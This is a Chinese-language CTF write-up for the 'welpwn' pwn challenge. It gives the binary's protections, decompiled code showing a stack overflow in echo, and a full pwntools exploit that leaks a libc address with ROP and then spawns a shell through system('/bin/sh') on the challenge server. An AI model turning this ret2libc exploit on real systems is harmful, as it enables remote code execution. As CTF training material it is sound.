1.看下保护发现只打开了NX。
[*] 'home/ctf/welpwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
2.拖入IDA看下结果
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf; // [rsp+0h] [rbp-400h]
write(1, "Welcome to RCTF\n", 0x10uLL);
fflush(_bss_start);
read(0, &buf, 0x400uLL);
echo((__int64)&buf);
return 0;
}
int __fastcall echo(__int64 pszInputString)
{
char szTemp[16]; // [rsp+10h] [rbp-10h]
for ( g_nIndex = 0; *(_BYTE *)(g_nIndex + pszInputString); ++g_nIndex )
szTemp[g_nIndex] = *(_BYTE *)(g_nIndex + pszInputString);
szTemp[g_nIndex] = 0;
if ( !strcmp("ROIS", szTemp) )
{
printf("RCTF{Welcome}", szTemp);
puts(" is not flag");
}
return printf("%s", szTemp);
}
看了下main函数里面没有什么可以利用的漏洞,但是echo可以造成栈溢出
如果将这样结构复制到s中遇见0就会停止那么从ret往下的将不能够复制到s中观察s跟buf在栈中的位置可以发现这有一个很巧妙的构造rop的方法,就是利用连续4个pop来解决这个问题
后面会再次利用该方法进行执行system函数,过程类似不再进行详细的描述exp如下:
from pwn import *
from LibcSearcher import *
context.log_level="debug"
# p = process("./welpwn")
p = remote("111.200.241.244",31741)
elf = ELF("welpwn")
main_addr = elf.symbols['main']
#main_addr = 0x0000000000400805
write_got = elf.got['write']
puts_plt = elf.plt['puts']
pop_rdi = 0x00000000004008a3
pop_4_ret = 0x000000000040089c
p.recvuntil("RCTF\n")
payload = "A"*0x10 + "bbbbbbbb" + p64(pop_4_ret) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(main_addr)
p.sendline(payload)
print p.recvuntil("A"*0x10 + "bbbbbbbb")
print p.recv(3)
write = u64(p.recv(6).ljust(8,'\x00'))
print(hex(write))
obj = LibcSearcher("write", write)
write_offset = obj.dump("write")
system_offset = obj.dump("system") #system offset
sh_offset = obj.dump("str_bin_sh") #/bin/sh offset
libc_base = write - write_offset
payload = "A"*0x10 + "bbbbbbbb" + p64(pop_4_ret) + p64(pop_rdi) + p64(libc_base + sh_offset) + p64(libc_base + system_offset)
p.sendline(payload)
p.interactive()